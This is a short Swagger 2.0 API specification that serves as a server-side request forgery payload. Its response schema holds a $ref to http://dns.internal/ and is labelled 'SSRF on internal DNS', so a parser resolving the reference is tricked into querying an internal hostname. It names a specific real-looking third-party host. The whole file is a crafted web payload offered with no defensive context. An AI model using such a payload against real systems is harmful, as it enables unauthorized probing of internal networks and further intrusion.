swagger: "2.0"
info:
  title: "SSRF - Internal DNS"
  version: "1.0"
host: "api.tektiklaode.visa.com.tr"
schemes:
  - https
paths:
  /dns:
    get:
      summary: "Try resolving internal DNS"
      responses:
        200:
          description: "SSRF on internal DNS"
          schema:
            $ref: "http://dns.internal/"
